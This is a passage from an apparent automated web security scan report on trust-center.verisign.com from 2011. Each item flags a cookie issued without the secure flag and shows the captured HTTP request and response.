Set-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4710
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/x-icon

...... ..........F... ......................h...............(...>...(... ...@....................................... ................. !....)...9.'&'.(*&.)*(.44-.=?8.BC?...U...]...a. d...i. .h...
...[SNIP]...

6.20. https://trust-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.21. https://trust-center.verisign.com/process/retail/help_and_support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/help_and_support

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:53 GMT
Server: Apache
Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 138732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.22. https://trust-center.verisign.com/process/retail/redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/redirect

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/redirect HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:00 GMT
Server: Apache
Set-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.23. https://trust-center.verisign.com/process/retail/session_timeout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/session_timeout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/session_timeout HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:59:40 GMT
Server: Apache
Set-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure
Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

6.24. https://trust-center.verisign.com/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:26:31 GMT
Server: Apache
Set-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

6.25. https://trust-center.verisign.com/process/retail/trust_product_selector previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...

6.26. https://trust-center.verisign.com/process/retail/trust_product_selector.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector.do HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:02 GMT
Server: Apache
Set-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.27. https://trust-center.verisign.com/rcm/TeaLeafTarget.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /rcm/TeaLeafTarget.html HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
Content-Length: 1103
X-TeaLeaf-Page-Objects: 0
Origin: https://trust-center.verisign.com
X-TeaLeaf-Page-Img-Fail: 1
X-TeaLeaf-Page-Render: 123
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

<ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:10 GMT
Server: Apache
Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 32
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<body>
OK
</body>
</html>

6.28. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/arrow_progressBar_gray.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 91
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a...............................!.......,.......... hs......+RR.N...}...XF.M4....1...;

6.29. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/arrow_progressBar_red.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 90
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........3....d.....2Y........!.......,...........(e.......RR.L...}Z..XF.M4..
.M..;

6.30. https://trust-center.verisign.com/rcm/verisign/images/divider.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/divider.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/divider.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
..........!.......,......
........;

6.31. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/ico_questionmark.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 374
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.....-......8..F.#O.....I.=.2Q.Wu..:...............1Z.\}.*U..B.%K.Bh....Mn....-Q....x.....n..{..n..h}.........................x.....q...4.......................................................
...[SNIP]...

6.32. https://trust-center.verisign.com/rcm/verisign/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/logo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 16073
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..=...............................................................................................................................................................................................
...[SNIP]...

6.33. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/popup_button_left.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
